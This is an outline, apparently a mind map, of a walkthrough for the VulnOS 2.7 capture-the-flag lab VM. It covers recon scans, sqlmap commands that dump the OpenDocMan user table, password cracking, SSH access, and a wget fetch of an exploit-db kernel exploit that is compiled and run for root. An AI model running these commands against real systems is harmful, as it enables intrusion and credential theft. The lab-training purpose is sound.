Please enable JavaScript.
Coggle requires JavaScript to display documents.
vulnos 2.7 (privilege escalation (runnning that exploit (we got root),…
vulnos 2.7
privilege escalation
cd /tmp
wget
https://www.exploit-db.com/download/37292
compiling exploit using gcc
runnning that exploit
we got root
final flag
/root/flag.txt
IP Discovery
Dirb [target ip]
Nikto ip
Nmap scan -sT -sV -O -A -p
Vulnerability searching
we found OpenDocMan v1.2 is vulnerable to SQL injection
https://www.exploit-db.com/exploits/32075/
tried uploading shell but failed
Exploiting vuln
SQLmap on Target, ajax_udf.php
sqlmap -u "
http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
" --dbs --level=5 --risk=3
searching for users and pass in DB
sqlmap -u "
http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
" -D jabcd0cs -T odm_user --dump
Enumerating port 80
navigate through all directories/ links on website
VM setup
Network Set Up
Password Cracking
Dictionary Attack on hash
log-in to machine
SSH using username and pass cracked
importing pty shell
Local enum and Vuln searching
cat /etc/lsb-release
file /bin/ls
we found vuln in ubuntu 14